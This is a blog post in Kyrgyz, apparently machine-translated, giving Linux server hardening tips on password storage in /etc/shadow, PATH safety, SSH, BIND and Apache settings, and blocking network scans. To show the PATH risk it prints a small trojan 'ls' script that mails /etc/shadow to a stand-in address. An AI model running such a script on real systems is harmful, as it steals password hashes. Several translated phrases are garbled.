Linux (Сервер) үчүн коопсуздук кеңештери (1-бөлүк)

Мен көптөн бери блогдо эч нерсе жарыялай элекмин жана сиз менен бир китептен алынган бир нече кеңешти бөлүшкүм келет, (Башкалардын арасында). Мен аны Университеттен таптым жана жөн эле окуп чыктым, бирок чындыгында бир аз эскирген жана көрсөтүлгөн ыкмалар тутумдун эволюциясын эске алганда иштеши күмөн, бирок алар көрсөтүлө турган кызыктуу аспектилер. 9788448140502

Алар сервер катары колдонулган Linux тутумуна багытталган кеңештер экендигин түшүндүргүм келип жатат, орточо же балким чоң масштабда, анткени колдонуучулардын иш столунун деңгээлинде, бирок колдонсо да, алар анчалык деле пайдалуу болбойт.

Ошондой эле, алар жөнөкөй ыкчам кеңештер экендигин белгилеп кетем, бирок мен дагы бир нерсени кененирээк түшүндүрүп бербейм, бирок белгилүү бир темада дагы бир кыйла конкреттүү жана кеңири билдирүү жасоону пландап жатам. Бирок кийинчерээк көрөм. Баштайлы.

Сырсөз саясаттары. 

Сырткы сөз айкашы окшош болгону менен, пароль саясатын жакшы жүргүзүү аялуу тутумдун ортосундагы айырманы түзөт же жок. "Катаал күч" сыяктуу чабуулдар тутумга кирүү үчүн туура эмес сыр сөздүн артыкчылыгын колдонот. Эң кеңири жайылган кеңештер:

  • Башкы жана кичине тамгаларды бириктирүү.
  • Атайын белгилерди колдонуңуз.
  • Сандар.
  • 6 цифрадан көп (үмүт 8ден жогору).

Буга кошумча, эки маанилүү файлды карап көрөлү.  / etc / passwd жана / etc / shadow.

Файлдын болушу абдан маанилүү / etc / passwd. Колдонуучунун атын, анын уидин, папкасынын жолун, башын берүүдөн тышкары .. ж.б. кээ бир учурларда ал колдонуучунун шифрленген ачкычын көрсөтөт.

 Келгиле, анын типтүү курамын карап көрөлү.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

user: cryptkey: uid: gid: path :: path: bash

Бул жердеги чыныгы көйгөй, ушул файлдын уруксаты бар -rw-r - r– бул тутумдагы каалаган колдонуучуга окууга уруксаты бар экендигин билдирет. жана шифрленген ачкычка ээ болуу менен, чыныгы ачкычты ачуу кыйын деле эмес.

Ошондуктан файл бар / etc / shadow. Бул колдонуучунун бардык ачкычтары жана башка нерселер сакталуучу файл. Бул файлда эч кандай колдонуучу окуй албашы үчүн, ага уруксат берилген.

Муну оңдоо үчүн файлга өтүшүбүз керек / etc / passwd жана шифрленген ачкычты "x" деп өзгөртүңүз, бул биздин ачкычты гана сактайт / etc / shadow.

desdelinux:x:500:501::/home/usuario1:/bin/bash

PATH жана .bashrc жана башка көйгөйлөр.

Колдонуучу өз консолундагы буйрукту аткарганда, кабык ошол буйрукту PATH чөйрөсүнүн өзгөрмөсүндө камтылган каталог тизмесинен издейт.

Эгер сиз консолго "echo $ PATH" деп терсеңиз, ал ушундай нерсени чыгарат.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Бул папкалардын ар бири - бул кабык аны аткаруу үчүн жазылган буйрукту издейт. Ал "." биринчи издөө папкасы буйрук аткарылган ошол эле папка экендигин билдирет.

"Карлос" деген колдонуучу бар дейли жана бул колдонуучу "жамандык кылгысы" келет. Бул колдонуучу өзүнүн негизги папкасында "ls" деп аталган файлды калтырышы мүмкүн жана бул файлда төмөнкүдөй буйрук аткарылышы мүмкүн:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Эгерде көздөгөн нерселер үчүн түпкү колдонуучу Карлос папкасынын ичиндеги папкаларды тизмектөөгө аракет кылса (адегенде ошол эле папкадагы буйрукту издей турган болсо, анда билбестиктен файлды ушул электрондук почтага, андан кийин папкаларга жөнөтүп жиберген болот тизмеленип, ал өтө кечке чейин билбей калат.

Болтурбоо үчүн биз "" белгисин жок кылышыбыз керек. PATH өзгөрмө

Ошол сыяктуу эле, /.bashrc, /.bashrc_profile, ./.login сыяктуу файлдар текшерилип, "" жок экендигин текшерип турушу керек. PATH өзгөрмөсүндө жана чындыгында ушул сыяктуу файлдардан белгилүү бир буйруктун багытын өзгөртө аласыз.

Кызматтар боюнча кеңештер:

SHH

  • Sshd_config файлындагы ssh протоколунун 1-нускасын өчүр.
  • Root колдонуучунун ssh менен кирүүсүнө жол бербеңиз.
  • Ssh_host_key, ssh_host_dsa_key жана ssh_host_rsa_key файлдарын жана папкаларын түпкү колдонуучу гана окушу керек.

байланыштыруу

  • Настройка номерин көрсөтпөшү үчүн named.conf файлындагы саламдашуу билдирүүсүн өзгөртүңүз
  • Аймак которууларын чектеп, ага муктаж болгон командалар үчүн гана мүмкүнчүлүк бериңиз.

Apache

  • Кызматтын сиздин нускаңызды саламдашуу билдирүүсүндө көрсөтүүсүнө жол бербеңиз. Httpd.conf файлын түзөтүп, саптарды кошуңуз же өзгөртүңүз:  

ServerSignature Off
ServerTokens Prod

  • Автоматтык түрдө индекстөөнү өчүрүү
  • .Htacces, * .inc, * .jsp .. ж.б. сыяктуу сезимтал файлдарды иштетпөө үчүн apache'ди конфигурациялаңыз
  • Кыздын баракчаларын же үлгүсүн кызматтан алып салыңыз
  • Кырсык болгон чөйрөдө apache иштетүү

Тармактын коопсуздугу.

Тышкы тармактан тутумуңузга мүмкүн болгон бардык жазууларды камтуу зарыл, бул жерде бузукулардын сканерлөөсүнө жана тармактан маалымат алуусуна жол бербөө үчүн бир нече маанилүү кеңештер келтирилген.

ICMP трафигин бөгөттөө

Брандмауэр кирүүчү жана чыккан ICMP трафигинин бардык түрлөрүн бөгөт коюу жана жаңырык жооптору үчүн конфигурацияланган болушу керек. Муну менен сиз, мисалы, IP диапазонунда жандуу жабдууларды издеп жаткан сканер сизди табат деп качасыз. 

TCP пинг сканерлөөсүнөн алыс болуңуз.

Тутумду сканерлөөнүн бир жолу - TCP пинг сканери. Сиздин серверде 80-портто Apache сервери бар деп коёлу. Бузулган адам ошол портко ACK сурам жөнөтсө болот, эгер система жооп берсе, компьютер тирүү болот жана калган портторду сканерлейт.

Бул үчүн, сиздин брандмауэр ар дайым "абалды билүү" параметрине ээ болушу керек жана буга чейин орнотулган TCP байланышына же сеансына туура келбеген бардык ACK топтомдорун жок кылышы керек.

Айрым кошумча кеңештер:

  • Тармакка порттун изделишин аныктоо үчүн IDS тутумдарын колдонуңуз.
  • Firewall'ду туташтыруучу булак портунун жөндөөлөрүнө ишенбей тургандай кылып конфигурациялаңыз.

Себеби, айрым сканерлер 20 же 53 сыяктуу "жасалма" булак портун колдонушат, анткени көптөгөн системалар бул портторго ftp же DNS үчүн мүнөздүү болгондуктан ишенишет.

БУРГУЛА: Ушул постто көрсөтүлгөн көйгөйлөрдүн көпчүлүгү учурдагы бардык таркатууларда чечилгенин унутпаңыз. Бирок сизге тийбеши үчүн, ушул көйгөйлөр жөнүндө негизги маалыматтарды алуу эч качан зыян келтирбейт.

БУРГУЛА: Кийинчерээк мен белгилүү бир теманы көрүп, кыйла толук жана учурдагы маалыматтарды камтыган пост жазам.

Баарын окуганга даярдайт.

Салам.


Макаланын мазмуну биздин принциптерге карманат редакциялык этика. Ката жөнүндө кабарлоо үчүн чыкылдатыңыз бул жерде.

Комментарий, өзүңүз калтырыңыз

Комментарий калтырыңыз

Сиздин электрондук почта дареги жарыяланбайт. Милдеттүү талаалар менен белгиленет *

*

*

  1. Маалыматтар үчүн жооптуу: Мигель Анхель Гатан
  2. Маалыматтын максаты: СПАМды көзөмөлдөө, комментарийлерди башкаруу.
  3. Мыйзамдуулук: Сиздин макулдугуңуз
  4. Маалыматтарды берүү: Маалыматтар үчүнчү жактарга юридикалык милдеттенмелерден тышкары билдирилбейт.
  5. Маалыматтарды сактоо: Occentus Networks (ЕС) тарабынан уюштурулган маалыматтар базасы
  6. Укуктар: Каалаган убакта маалыматыңызды чектеп, калыбына келтирип жана жок кыла аласыз.

  1.   маалыматтык ал мындай деди:

    Мага макала аябай жакты жана темага кызыгам, мындан ары да контент жүктөөнү сунуштайм.